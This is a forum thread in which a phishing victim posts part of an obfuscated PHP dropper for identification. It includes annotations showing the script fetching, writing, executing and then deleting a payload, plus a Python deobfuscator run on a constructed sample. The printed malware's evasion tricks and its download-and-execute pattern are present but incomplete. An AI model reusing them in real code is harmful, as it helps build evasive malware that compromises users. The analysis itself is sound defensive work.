
Is this a malicious PHP script?


cavemanager


I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros.. I noticed on system startup that I was seeing a PHP popup in the lower task bar. I then went to my local AppData\Roaming to find a suspicious folder with a php.exe file, a dll and a php script. I opened the PHP file in npp to have a look. I have very little experience with PHP so I can't really tell what the script is doing. Here is a copy/paste -- and I removed a little less than half the code just in case I am actually posting malicious code to this forum..


If I had to guess, I'd say it looks like it's doing encryption, so it's ransomware..


Script:

<?php
// Table of function names, each split into concatenated fragments so that a
// plain text search for names such as "exec" or "unlink" does not find them.
// The script never calls these directly; every call goes through
// $GLOBALS['38744245'][n](...). Resolved, the entries are:
$GLOBALS['38744245'] = Array(
    'cu' . 'rl_multi_exec',                              // [0]  curl_multi_exec
    'm' . 'ss' . 'ql_re' . 's' . 'ult',                  // [1]  mssql_result
    'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts',        // [2]  file_get_contents
    '' . 'fi' . 'l' . 'e_put_co' . 'n' . 't' . 'ents',   // [3]  file_put_contents
    'ex' . 'ec',                                         // [4]  exec
    '' . 'unlink',                                       // [5]  unlink
    '' . 'strpos',                                       // [6]  strpos
    'fg' . 'etcs' . 'v',                                 // [7]  fgetcsv
    'strnat' . 'cmp',                                    // [8]  strnatcmp
    'strlen',                                            // [9]  strlen
    'm' . 't_' . 'rand',                                 // [10] mt_rand
    'p' . 're' . 'g_repla' . 'ce_callb' . 'ack',         // [11] preg_replace_callback
    'ch' . 'r',                                          // [12] chr
    'ord',                                               // [13] ord
    'st' . 'r' . 'po' . 's',                             // [14] strpos
    'array_' . 'fi' . 'lter',                            // [15] array_filter
    's' . 'e' . 'ssion_is_r' . 'egist' . 'ered',         // [16] session_is_registered
    's' . 't' . 'rpos',                                  // [17] strpos
    'cr' . 'eate_func' . 'tion',                         // [18] create_function
    'i' . 'm' . 'agecreatefrom' . 'gd2part',             // [19] imagecreatefromgd2part
    'mt_' . 'rand'                                       // [20] mt_rand
);
?><?php
function _1369297363($taqqmn)
{
    // String table. Entries 0 and 1 are raw bytes that only become readable
    // after gnnnesr() decodes them with the numeric key $ucdxetr (below).
    // Entry 1 is entry 0 plus four extra bytes; the decoded values are passed
    // to file_get_contents (entry 0) and to file_put_contents/exec/unlink
    // (entry 1), i.e. they are the download source and the drop destination.
    // Entries 2-7 are plain literals; entry 5 is the empty string.
    $cabbfl = Array(
        "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e",
        "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e\x9c\x9a\x53\x21",
        'i',
        'bxhndsxsexibrxben',
        'gdz',
        '',
        'lxdgilfgvccek',
        'vz'
    );
    return $cabbfl[$taqqmn];
}
?><?php
// Numeric key handed to gnnnesr(); this line is cut off in the paste.
$ucdxetr = round(0 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.;
// Every "round(a + a + ...) - round(b + b + ...)" loop guard below folds to
// 0 (3693 - 3693, 1108 - 1108, 3667 - 3667), so these loops never run. They
// are junk calls that make the script look like ordinary code.
while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25))
    $GLOBALS['38744245'][0]($yfvmrsd, $rgyctvo, $hdoptxm);   // curl_multi_exec (dead code)
$ovehlgp = _1369297363(0);                                   // encoded source
$czdwupq = _1369297363(1);                                   // encoded destination path
while (round(0 + 369.33333333333 + 369.33333333333 + 369.33333333333) - round(0 + 221.6 + 221.6 + 221.6 + 221.6 + 221.6))
    $GLOBALS['38744245'][1]($acdfplp, $rgyctvo, $ghktwqf);   // mssql_result (dead code)
$ovehlgp = gnnnesr($ovehlgp, $ucdxetr);                      // decode source
$czdwupq = gnnnesr($czdwupq, $ucdxetr);                      // decode destination
$yxfgkhr = $GLOBALS['38744245'][2]($ovehlgp);                // file_get_contents(source): fetch the payload
if ($yxfgkhr) {
    $ghktwqf = gnnnesr($yxfgkhr, $ucdxetr);                  // decode the fetched payload with the same key
    $GLOBALS['38744245'][3]($czdwupq, $ghktwqf);             // file_put_contents(destination, payload): drop it to disk
    $GLOBALS['38744245'][4]($czdwupq);                       // exec(destination): run the dropped file
    while (!$GLOBALS['38744245'][5]($czdwupq))               // unlink(destination): retry until it is deleted
        Sleep(round(0 + 1));
    $ptdybmu = _1369297363(2);                               // 'i' (not used in the visible part)
}
// 32-bit rotate-left: the shift is masked to 0..31 and the result is
// (x << n) | (x >> (32 - n)); the constants fold to 31, 32 and 1.
// A typical building block of the decoding routine gnnnesr().
function tpugtze($acdfplp, $gsseqei)
{
    $wexiboc = $gsseqei & round(0 + 7.75 + 7.75 + 7.75 + 7.75);   // & 31
    // strpos('bxhndsxsexibrxben', 'gdz') is always false: another dead branch
    if ($GLOBALS['38744245'][6](_1369297363(3), _1369297363(4)) !== false)
        $GLOBALS['38744245'][7]($yfvmrsd, $ucdxetr, $ucdxetr, $czdwupq);   // fgetcsv (dead code)
    return ($acdfplp << $wexiboc) | (($acdfplp >> (round(0 + 10.666666666667 + 10.666666666667 + 10.666666666667) - $wexiboc)) & ((round(0 + 1) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $wexiboc)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)));
}
// Decoder for the string table and for the fetched payload (body cut off in the paste).
function gnnnesr($rgyctvo, $ucdxetr)
{
    $qaptxjz = _1369297363(5);                   // starts as the empty string
    while (round(0 + 3667) - round(0 + 3667))    // 0: dead loop
        $GLOBALS['38744245'][8]($yxfgkhr);       // strnatcmp (dead code)


[END PORTION OF CODE REMOVED]


?>
Edited by cavemanager
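The posted script uses three cheap tricks to hide what it does: function names are split into concatenated fragments, every constant is written as `round(0 + a + a + ...)`, and calls go through a numbered `$GLOBALS` table. Those tricks undo mechanically. The following Python script is an added example, not part of the thread or of the malware; it runs over a constructed PHP snippet written in the same style (not the real file), folds the concatenations and the `round()` arithmetic, inlines the resolved names at each call site, and reports which sensitive functions the table contains and how many loop guards fold to `while (0)`. It assumes single-quoted literals without backslash escapes and the exact `round(0 + ...)` shape seen on this page, which is enough for this family but is a heuristic, not a PHP parser.

```python
import math
import re

# Constructed sample in the style of the posted script (not the actual file
# from the thread): fragmented name table, indirect calls through it,
# round(0 + ...) constant arithmetic and a loop guard that folds to zero.
SAMPLE = r"""<?php
$GLOBALS['38744245'] = Array(
    'cu' . 'rl_multi_exec',
    'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts',
    '' . 'fi' . 'l' . 'e_put_co' . 'n' . 't' . 'ents',
    'ex' . 'ec',
    '' . 'unlink',
    'cr' . 'eate_func' . 'tion'
);
$data = $GLOBALS['38744245'][1]($src);
$GLOBALS['38744245'][2]($dst, $data);
$GLOBALS['38744245'][3]($dst);
$wexiboc = $gsseqei & round(0 + 7.75 + 7.75 + 7.75 + 7.75);
while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25))
    $GLOBALS['38744245'][0]($a, $b, $c);
?>"""

# Functions worth a second look when they show up in a resolved name table.
SUSPICIOUS = {"exec", "system", "passthru", "shell_exec", "eval",
              "create_function", "preg_replace_callback", "curl_multi_exec",
              "file_get_contents", "file_put_contents", "unlink"}

# Assumption: single-quoted literals with no backslash escapes inside.
CONCAT = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")
ROUND = re.compile(r"round\(\s*0(?:\s*\+\s*\d+(?:\.\d+)?)*\s*\)")
NUMBER = re.compile(r"\d+(?:\.\d+)?")
TABLE = re.compile(r"\$GLOBALS\['(\w+)'\]\s*=\s*Array\((.*?)\);", re.S)


def fold_concat(src):
    """Join 'a' . 'b' chains into one literal, repeating until nothing changes."""
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
    return src


def fold_round(src):
    """Replace round(0 + n + n + ...) with its value (PHP rounds half away from zero)."""
    def php_round(m):
        total = sum(float(t) for t in NUMBER.findall(m.group(0)))
        return str(int(math.floor(total + 0.5)))
    src = ROUND.sub(php_round, src)
    # A loop guard of the form "while (N - M)" with constants folds to a number;
    # the junk loops in this family fold to "while (0)", i.e. dead code.
    return re.sub(r"while \((\d+) - (\d+)\)",
                  lambda m: f"while ({int(m[1]) - int(m[2])})", src)


def resolve_table(src):
    """Find the $GLOBALS['key'] = Array(...) name table and inline it at each call site."""
    m = TABLE.search(src)
    if not m:
        return src, []
    key, names = m.group(1), re.findall(r"'([^']*)'", m.group(2))
    ref = re.compile(r"\$GLOBALS\['" + re.escape(key) + r"'\]\[(\d+)\]")
    src = ref.sub(lambda r: names[int(r.group(1))]
                  if int(r.group(1)) < len(names) else r.group(0), src)
    return src, names


def deobfuscate(src):
    """Return (readable source, resolved name table, sensitive names, dead loop count)."""
    src = fold_round(fold_concat(src))
    src, names = resolve_table(src)
    flags = sorted(SUSPICIOUS & set(names))
    dead = len(re.findall(r"while \(0\)", src))
    return src, names, flags, dead


if __name__ == "__main__":
    clean, names, flags, dead = deobfuscate(SAMPLE)
    print(clean)
    print("resolved table:", names)
    print("sensitive functions:", flags)
    print("dead while (0) loops:", dead)
```

Run on the sample, the cleaned output reads as `$data = file_get_contents($src); file_put_contents($dst, $data); exec($dst);` with a `while (0)` guard around the `curl_multi_exec` call, which is the fetch, drop, execute pattern visible in the posted script once the same folding is applied by hand. The byte strings decoded by `gnnnesr()` are out of scope here because that routine's body was not posted.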

:facepalm:


It's pretty much guaranteed to be malicious, and it's likely not the only bad thing that got added to your computer.


I figured.. any way to check where/what else got added to my pc? I have Trend Micro AV as well as Malwarebytes.. I've done scans but nothing turned up...


Forget about trying to “clean” the system. Cut the Internet connection, save your data (or what's left of it), wipe the PC and start over.


And for the love of god, stop opening random files from the Internet.


I'm not just downloading random files from the Internet. I am usually careful about these things but it just so happened that I have UPS orders and the email looked legit. I don't know if you've heard, but even knowledgeable people can be tricked too.


I did immediately disconnect from the network and do some file copies just in case. Meanwhile, Trend eventually grabbed the virus and I think I stopped it before it could do any damage. I am planning to wipe and re-install just because I know it's the best thing to do.

Edited by cavemanager

I don't know if you've heard, but even knowledgeable people can be tricked too.


Sure, but going to a website which clearly isn't the official one (ups.com uses HTTPS with an EV certificate for everything), downloading a .doc file (why would UPS use such a weird format?), opening it directly in Word and probably clicking past the macro warnings is a pretty long chain of actions.


I'm not saying this to put you down or pretend like I'm immune to attacks. My point is that you need a lot more paranoia on multiple levels, not just related to strange e-mails.


Sure, but going to a website which clearly isn't the official one (ups.com uses HTTPS with an EV certificate for everything), downloading a .doc file (why would UPS use such a weird format?), opening it directly in Word and probably clicking past the macro warnings is a pretty long chain of actions.


I'm not saying this to put you down or pretend like I'm immune to attacks. My point is that you need a lot more paranoia on multiple levels, not just related to strange e-mails.


I clicked the link in my email and the file just downloaded/ran. I didn't manually go out to a website to download it. Like I said, the email looked really legit and I just happened to be waiting for a package from UPS. Plus, this was before I had coffee.. Looking back, I should have hovered over the link to see the real destination. Live and learn. 


If simply opening the file was enough then there's a good chance your Office isn't up to date with patches: the file should have been blocked by Word from doing anything, specifically for this reason.


But yeah, lesson learned. Companies do not send attachments with emails, not least because of the processing overhead to do so - they either tell you what you need to know in the email, or link(/phish) you to a website.
